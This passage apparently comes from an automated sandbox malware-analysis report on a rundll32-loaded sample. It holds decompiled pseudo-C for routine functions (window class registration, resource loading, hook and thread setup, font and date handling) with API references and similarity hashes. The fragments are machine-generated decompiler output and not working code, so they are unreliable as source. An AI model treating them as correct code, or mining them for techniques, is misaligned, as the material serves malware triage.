				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00E167F0 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0xe7f668; // 0xe10000
						_t20 =  *0xe7c430; // 0xe2dd94
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0xe7c40c);
				}
				_t13 =  *0xe7f668; // 0xe10000
				_t24 =  *0xe7c430; // 0xe2dd94
				_t22 = E00E16D14(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00E2DCE8(_a4, _a8));
				}
				return _t22;
			}

0x00e2ddab
0x00e2ddb0
0x00e2ddb9
0x00e2ddbf
0x00e2ddc5
0x00e2ddcd
0x00e2ddcf
0x00e2ddd2
0x00e2dde0
0x00e2dde2
0x00e2dde8
0x00e2ddee
0x00e2ddee
0x00e2ddf8
0x00e2ddf8
0x00e2de0e
0x00e2de1b
0x00e2de2b
0x00e2de32
0x00e2de43
0x00e2de43
0x00e2de4e

APIs

GetClassInfoA.USER32 ref: 00E2DDC5
UnregisterClassA.USER32 ref: 00E2DDEE
RegisterClassA.USER32 ref: 00E2DDF8
SetWindowLongA.USER32 ref: 00E2DE43

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 26713a71879fc5a42e83cc98e1900c446833518a9d621d4a1a28ef0a6065e20d
Instruction ID: 70255f61fa81a14cdb01baeb10225839cc87d5f7e2aae7032736d9e6cf8c591f
Opcode Fuzzy Hash: 26713a71879fc5a42e83cc98e1900c446833518a9d621d4a1a28ef0a6065e20d
Instruction Fuzzy Hash: FD018471644204AFCB10EBA9EC91FAA33ACFB58308F105224F618F72A1D671D8C9C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E29850 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E29850(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00E297E0(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0xe298f4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00E297E0(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0xe298f4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0xe29568
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00E29528(_t23, _t25, _t18);
			}

0x00e29857
0x00e2985a
0x00e2985c
0x00e2986c
0x00e2986e
0x00e29871
0x00e29873
0x00e29876
0x00e2987b
0x00e2987b
0x00e2987c
0x00e29886
0x00e29888
0x00e2988b
0x00e2988d
0x00e29890
0x00e29895
0x00e29896
0x00e298a0
0x00e298a1
0x00e298a5
0x00e298ae
0x00e298b9

APIs

FindResourceA.KERNEL32(00E10000,?,?), ref: 00E29867
LoadResource.KERNEL32(00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?,?,?,?,?,00E7BB73,0000000A,0000001F), ref: 00E29881
SizeofResource.KERNEL32(00E10000,00E298F4,00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?,?,?,?,?,00E7BB73), ref: 00E2989B
LockResource.KERNEL32(00E29568,00000000,00E10000,00E298F4,00E10000,00E298F4,00E254E8,00E10000,00000001,?,?,00E297C1,?), ref: 00E298A5

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
Instruction ID: 677cef858ca01ff89de1175e401e207c021030fd169772c093e2919b50106230
Opcode Fuzzy Hash: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
Instruction Fuzzy Hash: 45F081B36042146F5708EEACB881D9B77ECEE893A0710246AF91CE7307DA30DD014374

Uniqueness

Uniqueness Score: -1.00%

Function 01081DDF Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01081DDF() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x10841b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x10841bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x10841ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10841a8 = _t5;
						 *0x10841b0 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10841a4 = _t6;
						if(_t6 == 0) {
							 *0x10841a4 =  *0x10841a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x01081de0
0x01081dee
0x01081df6
0x01081dfb
0x01081e4d
0x01081e4d
0x01081dfd
0x01081e05
0x01081e0d
0x01081e0d
0x01081e49
0x01081e4b
0x00000000
0x00000000
0x00000000
0x01081e07
0x01081e09
0x01081e0f
0x01081e0f
0x01081e14
0x01081e22
0x01081e27
0x01081e2d
0x01081e35
0x01081e3a
0x01081e3c
0x01081e3c
0x01081e46
0x01081e0b
0x01081e0b
0x00000000
0x01081e0b
0x01081e09

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010814C5), ref: 01081DEE
GetVersion.KERNEL32 ref: 01081DFD
GetCurrentProcessId.KERNEL32 ref: 01081E14
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01081E2D

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: ec0c3d6738ec2a517a0b665241196ff427a802c2334894fd7b851521ac1a0bee
Instruction ID: bfd38d09ec40802adff1a1ba2955eec90bb8c321845d2abafa0ff9452bc3692e
Opcode Fuzzy Hash: ec0c3d6738ec2a517a0b665241196ff427a802c2334894fd7b851521ac1a0bee
Instruction Fuzzy Hash: 4DF03C3068D3219EEBB09B6CBC0A78D3BA0FB55B21F040055F2C1DA1C8E3BA84428F59

Uniqueness

Uniqueness Score: -1.00%

Function 00E5380C Relevance: 6.0, APIs: 4, Instructions: 35
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E5380C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0xe7fb6c; // 0xf013d0
					if(GlobalFindAtomA(E00E14528(_t5)) !=  *0xe7fb66) {
						_t15 = E00E537D8(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0xe7fb66 & 0x0000ffff);
					}
				}
				return _t15;
			}

0x00e5380c
0x00e5380e
0x00e5380f
0x00e53811
0x00e53815
0x00e5382c
0x00e53843
0x00e5385e
0x00e53845
0x00e53853
0x00e53853
0x00e53843
0x00e53865

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00E53819
GetCurrentProcessId.KERNEL32(?,00000000,00000000,00E551BF,?,?,00000000,00000001,00E551EC), ref: 00E53822
GlobalFindAtomA.KERNEL32 ref: 00E53837
GetPropA.USER32 ref: 00E5384E

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: ca5b64a2cbf957e64cf849c0c717a078303942ffe36f1a70c1656d954fade79c
Instruction ID: ed2f7f339223a6016b80f69f50e5482d46fc80c2224285904d9fbfe57492adc9
Opcode Fuzzy Hash: ca5b64a2cbf957e64cf849c0c717a078303942ffe36f1a70c1656d954fade79c
Instruction Fuzzy Hash: EFF030F1704114AA8628B7BAAC818AB62DC9A147D63116D31FD45FA246D520CD8883B9

Uniqueness

Uniqueness Score: -1.00%

Function 00E4714C Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E4714C(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0xe7fb1c; // 0xf0184c
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0xe7fb34 == 0) {
						_t2 = SetWindowsHookExA(3, 0xe47108, 0, GetCurrentThreadId());
						 *0xe7fb34 = _t2;
					}
					if( *0xe7fb30 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0xe7fb30 = _t2;
					}
					if( *0xe7fb38 == 0) {
						_t2 = CreateThread(0, 0x3e8,  &M00E470AC, 0, 0, _t7);
						 *0xe7fb38 = _t2;
					}
				}
				return _t2;
			}

0x00e4714d
0x00e47159
0x00e47162
0x00e47174
0x00e47179
0x00e47179
0x00e47185
0x00e4718f
0x00e47194
0x00e47194
0x00e471a0
0x00e471b3
0x00e471b8
0x00e471b8
0x00e471a0
0x00e471be

APIs

GetCurrentThreadId.KERNEL32 ref: 00E47164
SetWindowsHookExA.USER32 ref: 00E47174
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00E49951,?,?,00F0184C,00000000,?,00E492F8), ref: 00E4718F
CreateThread.KERNEL32 ref: 00E471B3

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: e982df4ad3b8be18cf26c58b9c74d22a5a0a8b6ea282749cc31c044a6a5f3809
Instruction ID: b1aa26ea9a82ba6b9f465203ea4e5bad0d598b720f59e31230c80eafd6f93edd
Opcode Fuzzy Hash: e982df4ad3b8be18cf26c58b9c74d22a5a0a8b6ea282749cc31c044a6a5f3809
Instruction Fuzzy Hash: 5AF0FEF06CA300BEF720EB61ECA7F593694EB51B1AF112035F5887A1D1CBB054C98655

Uniqueness

Uniqueness Score: -1.00%

Function 00E2FF38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E2FF38(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t100;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0xe300c1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					__eflags = 0;
					 *[fs:eax] = 0;
					_push(0xe300c8);
					return E00E1408C( &_v80, 3);
				} else {
					_t76 =  *0xe7f8e0; // 0xf00a30
					E00E2F27C(_t76);
					_push(_t137);
					_push(0xe30099);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00E142CC( &_v72, _v8 + 0x1b,  *(_v8 + 0x19) & 0x00000008);
						_t100 = E00E18000(_v72, "Default");
						_t146 = _t100;
						if(_t100 != 0) {
							__eflags = _v8 + 0x1b;
							E00E142CC( &_v80, _v8 + 0x1b, _v8 + 0x1b);
							E00E18A20( &(_v68.lfFaceName), _v80);
						} else {
							E00E142CC( &_v76, "\rMS Sans Serif", _t146);
							E00E18A20( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00E3021C(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0xe300a0);
					_t81 =  *0xe7f8e0; // 0xf00a30
					return E00E2F288(_t81);
				}
			}

0x00e2ff39
0x00e2ff3b
0x00e2ff41
0x00e2ff44
0x00e2ff47
0x00e2ff4a
0x00e2ff4e
0x00e2ff4f
0x00e2ff54
0x00e2ff57
0x00e2ff5d
0x00e2ff67
0x00e300a6
0x00e300ab
0x00e300ae
0x00e300c0
0x00e2ff6d
0x00e2ff6d
0x00e2ff72
0x00e2ff79
0x00e2ff7a
0x00e2ff7f
0x00e2ff82
0x00e2ff8c
0x00e2ff98
0x00e2ff9d
0x00e2ffa2
0x00e2ffa7
0x00e2ffb1
0x00e2ffbc
0x00e2ffb3
0x00e2ffb3
0x00e2ffb3
0x00e2ffcd
0x00e2ffda
0x00e2ffe7
0x00e2fff0
0x00e2fffc
0x00e30009
0x00e3000e
0x00e30010
0x00e30032
0x00e30035
0x00e30040
0x00e30012
0x00e3001a
0x00e30025
0x00e30025
0x00e30045
0x00e30049
0x00e3004d
0x00e30058
0x00e3005a
0x00e30062
0x00e3005c
0x00e3005e
0x00e30068
0x00e30060
0x00e3006e
0x00e3006e
0x00e3005e
0x00e3007e
0x00e3007e
0x00e30083
0x00e30086
0x00e30089
0x00e3008e
0x00e30098
0x00e30098

APIs

Part of subcall function 00E2F27C: RtlEnterCriticalSection.KERNEL32(?,00E2F2B9), ref: 00E2F280

CreateFontIndirectA.GDI32(?), ref: 00E30076

Strings

Default, xrefs: 00E30004
MS Sans Serif, xrefs: 00E30015

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CreateCriticalEnterFontIndirectSection
String ID: MS Sans Serif$Default
API String ID: 2931345757-2137701257
Opcode ID: 6b43d5931a23370d723dc5a005e6b84abee11827b876587c42e037e0cbabb5c7
Instruction ID: ed74136b04d310177409274b2585bd6abdaae2cd46d1a4853f5403e132dc3f7a
Opcode Fuzzy Hash: 6b43d5931a23370d723dc5a005e6b84abee11827b876587c42e037e0cbabb5c7
Instruction Fuzzy Hash: BF517530A08248DFDB05CFA8C595BCDBBF6AF49304F6594A9E800B7362D3749E84DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E1BD60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E1BD60(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0xe1bf1b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0xe7e13c; // 0xe16fe4
					E00E15E1C(_t52,  &_v8);
				} else {
					_t86 =  *0xe7e31c; // 0xe16fdc
					E00E15E1C(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0xe7e150; // 0xe16f8c
					E00E15E1C(_t60,  &_v372);
					E00E1B940(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00E142D8( &_v340, 0x105,  &_v297);
					E00E18858(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0xe7e1e0; // 0xe17084
					E00E15E1C(_t82,  &_v344);
					E00E1B940(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(0xe1bf22);
				E00E14068( &_v372);
				E00E1408C( &_v344, 3);
				return E00E14068( &_v8);
			}

0x00e1bd60
0x00e1bd6d
0x00e1bd73
0x00e1bd79
0x00e1bd7f
0x00e1bd85
0x00e1bd8a
0x00e1bd8b
0x00e1bd90
0x00e1bd93
0x00e1bd99
0x00e1bda0
0x00e1bdb4
0x00e1bdb9
0x00e1bda2
0x00e1bda5
0x00e1bdaa
0x00e1bdaa
0x00e1bdbe
0x00e1bdcb
0x00e1bdd7
0x00e1be93
0x00e1be99
0x00e1bea3
0x00e1bea9
0x00e1beb0
0x00e1beb6
0x00e1becc
0x00e1bed1
0x00e1bee3
0x00e1bdfa
0x00e1bdfd
0x00e1be03
0x00e1be1b
0x00e1be2c
0x00e1be37
0x00e1be3d
0x00e1be47
0x00e1be4d
0x00e1be54
0x00e1be5a
0x00e1be70
0x00e1be75
0x00e1be87
0x00e1be8c
0x00e1beec
0x00e1beef
0x00e1bef2
0x00e1befd
0x00e1bf0d
0x00e1bf1a

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,00E1BF1B), ref: 00E1BDCB
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00E1BF1B), ref: 00E1BDED

Part of subcall function 00E15E1C: LoadStringA.USER32 ref: 00E15E4D

Strings

o, xrefs: 00E1BDB4

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: o
API String ID: 902310565-2084137227
Opcode ID: 606acc045e3a690e530e30ed8122421da413c483efa71790e4c8ddd4e9f0842e
Instruction ID: c78352723ea357420fc97da1a25e1fbc3cb1fcdc71aeab7f3d8c17a4a6817d40
Opcode Fuzzy Hash: 606acc045e3a690e530e30ed8122421da413c483efa71790e4c8ddd4e9f0842e
Instruction Fuzzy Hash: 9B410F70900668CFDB61DF68CC85BDAB7F9AB48304F4054E5E908AB351D770AE89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E19EE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E19EE4(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0xe19fc2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00E14068(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00E14100( &_v8, 0xe19fe4);
				} else {
					E00E14100( &_v8, 0xe19fd8);
				}
				_t32 = E00E14528(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00E142D8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00E14588( *_t49, E00E14328( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0xe19fc9);
				return E00E14068( &_v8);
			}

0x00e19ef1
0x00e19ef4
0x00e19ef6
0x00e19efa
0x00e19efb
0x00e19f00
0x00e19f03
0x00e19f08
0x00e19f14
0x00e19f1f
0x00e19f2a
0x00e19f31
0x00e19f4a
0x00e19f33
0x00e19f3b
0x00e19f3b
0x00e19f5e
0x00e19f77
0x00e19f86
0x00e19f8c
0x00e19fa7
0x00e19fa7
0x00e19f8c
0x00e19fae
0x00e19fb1
0x00e19fb4
0x00e19fc1

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00E19FC2), ref: 00E19F6A
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00E19FC2), ref: 00E19F70

Strings

yyyy, xrefs: 00E19F45

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: f55c2849331f1a5e5836db6f2ae8385358626da03b5c8ec25dad45ffb9015144
Instruction ID: 6d43a27a7ee7aba5cba612769975e52f30bca67eb5711dfde0448c47343537f2
Opcode Fuzzy Hash: f55c2849331f1a5e5836db6f2ae8385358626da03b5c8ec25dad45ffb9015144
Instruction Fuzzy Hash: 782141B4700208AFDB11EBA8D852AEEB3E8EF4C700F5160A5B905F7392D7709E85C765

Uniqueness

Uniqueness Score: -1.00%

Function 00E1F220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00E1F220(signed short* __eax, void* __ecx, intOrPtr* __edx) {
				intOrPtr* _v16;
				void* _t15;
				signed short* _t23;
				signed short _t34;
				intOrPtr* _t35;
				void* _t36;

				_t12 = __eax;
				_push(__ecx);
				_t35 = __edx;
				_t23 = __eax;
				if(( *__eax & 0x0000bfe8) != 0) {
					_t12 = E00E1EF28(__eax, __ecx);
				}
				_t34 =  *_t35;
				if(_t34 >= 0x14) {
					if(_t34 != 0x100) {
						if(_t34 != 0x101) {
							if((_t34 & 0x00002000) == 0) {
								if(E00E239DC(_t34, _t36) == 0) {
									_push(_t35);
									_push(_t23);
									L00E1D9A8();
									_t15 = E00E1EBF4(_t14);
								} else {
									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
								}
							} else {
								_t15 = E00E1F04C(_t23, 0xe1f218, _t35);
							}
						} else {
							 *_t23 = _t34;
							_t23[4] =  *(_t35 + 8);
							_t15 =  *0xe7f820();
						}
					} else {
						 *_t23 = 0x100;
						_t23[4] = 0;
						_t15 = E00E140BC( &(_t23[4]),  *(_t35 + 8));
					}
				} else {
					_push(_t35);
					_push(_t23);
					L00E1D9A8();
					_t15 = E00E1EBF4(_t12);
				}
				return _t15;
			}

0x00e1f220
0x00e1f223
0x00e1f224
0x00e1f226
0x00e1f22d
0x00e1f231
0x00e1f231
0x00e1f236
0x00e1f23d
0x00e1f252
0x00e1f270
0x00e1f28a
0x00e1f2a7
0x00e1f2ba
0x00e1f2bb
0x00e1f2bc
0x00e1f2c1
0x00e1f2a9
0x00e1f2b5
0x00e1f2b5
0x00e1f28c
0x00e1f295
0x00e1f295
0x00e1f272
0x00e1f272
0x00e1f278
0x00e1f27d
0x00e1f27d
0x00e1f254
0x00e1f254
0x00e1f25b
0x00e1f264
0x00e1f264
0x00e1f23f
0x00e1f23f
0x00e1f240
0x00e1f241
0x00e1f246
0x00e1f246
0x00e1f2ca

APIs

VariantCopy.OLEAUT32(?), ref: 00E1F241

Part of subcall function 00E1EF28: VariantClear.OLEAUT32(?), ref: 00E1EF37

Strings

\, xrefs: 00E1F27D

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Variant$ClearCopy
String ID: \
API String ID: 274517740-2545358515
Opcode ID: db4b2302235fa02abb901d7c9750ce7c6ace4e32fba30aa5b3a5075a99a310a0
Instruction ID: 0f6d09adff5a2bdb1e5584e91598aa5859d751e27f795fa13bb2073324e47c33
